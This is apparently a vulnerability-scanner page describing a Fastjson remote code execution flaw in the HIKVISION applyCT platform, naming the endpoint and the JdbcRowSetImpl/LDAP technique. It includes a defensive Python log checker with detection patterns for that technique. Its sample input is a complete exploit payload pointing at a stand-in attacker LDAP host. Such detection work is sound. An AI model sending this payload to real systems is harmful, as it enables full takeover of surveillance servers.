HIKVISION applyCT Remote Code Execution Scanner
Detects 'Remote Code Execution (RCE)' vulnerability in HIKVISION applyCT.
Short Info
Level: Critical
Scan Type: Single Scan
Can be used by: Asset Owner
Estimated Time: 10 seconds
Time Interval: 16 days 20 hours
Scan only one: Domain, IPv4, Subdomain
Toolbox: -
The HIKVISION applyCT is a comprehensive security management platform widely used by businesses and organizations for surveillance and security management. Developed by HIKVISION, a leading provider of security products and solutions, this platform helps users monitor multiple security devices efficiently. It provides a centralized interface for managing security devices, making it an integral part of security operations. HIKVISION applyCT is integrated with advanced analytics to enhance surveillance capabilities. The platform is adopted by a diverse range of sectors, including government, commercial, and industrial organizations, for robust security infrastructure. Its scalability allows it to serve both small-scale and large-scale surveillance needs.
Remote Code Execution (RCE) is a severe vulnerability that allows an attacker to execute arbitrary code on a target machine remotely. This type of vulnerability arises when user input is not properly validated, allowing malicious payloads to be executed within the system. RCE can lead to complete system compromise, giving an attacker full control over the affected system. Exploiting an RCE vulnerability can result in unauthorized data access, system manipulation, or use of the compromised host to attack other systems on the network. Detecting this vulnerability is crucial for maintaining system integrity and preventing unauthorized exploitation. Timely identification and remediation are essential to safeguard data and resources from potential attacks.
The vulnerability in the HIKVISION applyCT platform involves the processing of JSON data via the Fastjson library. An attacker can exploit this by crafting a JSON payload that instructs Fastjson to instantiate a specific Java class, `JdbcRowSetImpl`, which allows remote code execution through the LDAP protocol. The crafted payload is sent to the `/bic/ssoService/v1/applyCT` endpoint in a POST request with the `Content-Type` header set to `application/json`. By pointing the class's datasource parameter at an untrusted LDAP server, the attacker can gain control over the server. The vulnerability arises from insufficient input validation, enabling arbitrary class loading and execution of unauthorized code.
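As an added defensive example (not part of the original page or the scanner itself), the following Python checks logged requests to the endpoint described above for the three indicators this page names: a Fastjson `@type` autotype marker, a reference to the `JdbcRowSetImpl` class, and a string value pointing at an LDAP (or RMI) server. The sample requests are constructed for illustration.

```python
"""Flag Fastjson JdbcRowSetImpl / JNDI deserialization indicators in HTTP request logs."""
import json
import re

APPLYCT_ENDPOINT = "/bic/ssoService/v1/applyCT"
GADGET_SUFFIX = "JdbcRowSetImpl"            # class named on this page
JNDI_URL = re.compile(r"^\s*(ldaps?|rmi)://", re.IGNORECASE)


def _walk(obj):
    """Yield (key, value) for every scalar in a parsed JSON document, at any depth."""
    if isinstance(obj, dict):
        for k, v in obj.items():
            yield from _walk(v) if isinstance(v, (dict, list)) else [(k, v)]
    elif isinstance(obj, list):
        for v in obj:
            yield from _walk(v) if isinstance(v, (dict, list)) else [(None, v)]


def classify_request(path, content_type, body):
    """Return a list of human-readable findings for one request; [] means nothing suspicious."""
    if not path.startswith(APPLYCT_ENDPOINT) or "application/json" not in content_type.lower():
        return []                            # only the vulnerable endpoint is in scope here
    try:
        doc = json.loads(body)
    except ValueError:
        return ["non-JSON body on applyCT endpoint"]
    pairs = list(_walk(doc))
    types = [v for k, v in pairs if k == "@type" and isinstance(v, str)]
    findings = []
    if types:
        findings.append("fastjson @type autotype marker present")
    if any(t.endswith(GADGET_SUFFIX) for t in types):
        findings.append("JdbcRowSetImpl gadget class referenced")
    if any(isinstance(v, str) and JNDI_URL.match(v) for _, v in pairs):
        findings.append("JNDI (ldap/rmi) URL in JSON string value")
    return findings


def scan_requests(records):
    """Return [(index, findings)] for every record in (path, content_type, body) form that was flagged."""
    return [(i, f) for i, r in enumerate(records) if (f := classify_request(*r))]


# Constructed sample log records, not captured traffic.
SAMPLE_REQUESTS = [
    (APPLYCT_ENDPOINT, "application/json",
     '{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://attacker.example/x"}'),
    (APPLYCT_ENDPOINT, "application/json", '{"user":"alice","token":"abc123"}'),
    ("/other/api", "application/json", '{"@type":"x.JdbcRowSetImpl"}'),
]

if __name__ == "__main__":
    for idx, found in scan_requests(SAMPLE_REQUESTS):
        print(f"record {idx}: {'; '.join(found)}")
```

Nested objects and arrays are walked too, so a gadget wrapped inside an otherwise legitimate request body is still flagged.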
Exploitation of this RCE vulnerability can have severe consequences, including unauthorized access to sensitive information, data breaches, and full control over the server. An attacker could inject malicious code to perform any number of actions, from stealing confidential data to disrupting service operations. Such security breaches can lead to financial loss, reputational damage, and legal liabilities. The compromised server also becomes a foothold for further attacks within the network, putting additional systems and applications at risk. Addressing this vulnerability is critical to prevent unauthorized activity and ensure the safety and reliability of system operations.
REFERENCES
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/HIKVISION/HIKVISION%20%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20applyCT%20Fastjson%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
- https://github.com/MrWQ/vulnerability-paper/blob/master/bugs/%E6%B5%B7%E5%BA%B7%E5%A8%81%E8%A7%86%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%20Fastjson%20%E5%86%85%E5%AD%98%E9%A9%AC%E6%89%93%E6%B3%95.md
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/hikvision-fastjson-rce.yaml